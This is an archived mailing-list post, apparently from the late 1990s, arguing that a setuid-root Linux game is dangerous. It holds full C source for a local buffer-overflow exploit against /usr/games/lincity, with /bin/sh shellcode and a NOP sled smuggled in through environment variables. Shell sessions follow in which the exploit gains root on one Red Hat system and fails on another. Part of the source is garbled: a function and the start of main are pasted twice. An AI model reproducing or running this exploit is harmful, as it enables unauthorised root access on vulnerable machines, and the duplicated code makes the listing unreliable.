In reply to TFreak answer: I think IT IS dangerous. Observe: First we present owr anfitrion: --------------------------- lincityxpl.c --------------------------------- #include <stdio.h> #include <stdlib.h> #define HOMESIZE 500 #define HUEVOSIZE 5000 char *shell = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f" "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd" "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh"; long esp(void) { __asm__("movl %esp,%eax\n"); } int main(void) { char *ptr, *bof, *egg; long *addr_ptr, addr; int i; if ( !(bof = malloc(HOMESIZE)) ) { printf("NoMoreMemory4bof.\n"); exit(1); } if ( !(egg = malloc(HUEVOSIZE)) ) { printf("NoMoreMemory4egg.\n"); exit(1); } long esp(void) { __asm__("movl %esp,%eax\n"); } int main(void) { char *ptr, *bof, *egg; long *addr_ptr, addr; int i; if ( !(bof = malloc(HOMESIZE)) ) { printf("NoMoreMemory4bof.\n"); exit(1); } if ( !(egg = malloc(HUEVOSIZE)) ) { printf("NoMoreMemory4egg.\n"); exit(1); } addr = esp(); addr_ptr = (long *) bof; for (i = 0; i < HOMESIZE; i += 4) *(addr_ptr++) = addr; ptr = egg; for (i = 0; i <= HUEVOSIZE - strlen(shell) - 2; i++) *(ptr++) = 0x90; for( i = 0; i < strlen(shell); i++) *(ptr++) = shell[i]; printf("Address:\t0x%x\n", addr); bof[HOMESIZE - 1] = '\0'; egg[HUEVOSIZE - 1] = '\0'; memcpy(bof, "BOF=", 4); memcpy(egg , "EGG=", 4); putenv(bof); putenv(egg); system("export HOME=$BOF; /usr/games/lincity"); } ----------------------------------------------------------------------- System #1: ~~~~~~~~~~ $ cat /etc/redhat-release release 4.1 (Vanderbilt) $ uname -a Linux System1 2.0.29 #3 Thu Jun 5 16:37:15 ARST 1997 i486 $ ls -la /usr/games/lincity -rwsr-sr-x 1 root linux 793395 Mar 17 07:16 /usr/games/lincity $ ldd /usr/games/lincity libvgagl.so.1 => /usr/lib/libvgagl.so.1.2.10 libvga.so.1 => /usr/lib/libvga.so.1.2.10 libg++.so.27 => /usr/lib/libg++.so.27.1.4 libstdc++.so.27 => /usr/lib/libstdc++.so.27.1.4 libm.so.5 => /lib/libm.so.5.0.6 libc.so.5 => /lib/libc.so.5.3.12 $ cc -o fl lincityxpl.c $ id uid=500(bst) gid=500(bst) groups=500(bst) $ ./fl Address: 0xbffffd4c bash# id uid=500(bst) gid=500(bst) euid=0(root) egid=0(linux) groups=500(bst) bash# System #2: ~~~~~~~~~~ $ cat /etc/redhat-release release 4.2 (Biltmore) $ uname -a Linux System2 2.0.33 #4 Thu Jan 15 08:49:37 GMT 1998 i586 unknown $ ls -la /usr/games/lincity -rwsr-sr-x 1 root root 794612 Mar 17 09:22 /usr/games/lincity $ ldd /usr/games/lincity libvgagl.so.1 => /usr/lib/libvgagl.so.1 (0x4000a000) libvga.so.1 => /usr/lib/libvga.so.1 (0x40017000) libg++.so.27 => /usr/lib/libg++.so.27 (0x40046000) libstdc++.so.27 => /usr/lib/libstdc++.so.27 (0x40079000) libm.so.5 => /lib/libm.so.5 (0x400a8000) libc.so.5 => /lib/libc.so.5 (0x400b0000) $ id uid=501(rewt) gid=502(rewt) groups=100(users),502(rewt) $ ls -la /usr/lib/libsvga*.so.* -rwxr-xr-x 1 root bin 182356 Sep 2 1996 /usr/lib/libvga.so.1.2.10-rwxr-xr-x 1 root bin 46548 Sep 2 1996 /usr/lib/libvgagl.so.1.2.10 $ cc -o fl lincityxpl.c $ id uid=500(bst) gid=500(bst) groups=500(bst) $ ./fl Address: 0xbffffdd2f sh-2.01$ id uid=500(bst) gid=500(bst) groups=500(bst) Well, as you can see, the *vga* libs are the same. Please mail me with your conclutions. Bst.
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:45:50 PDT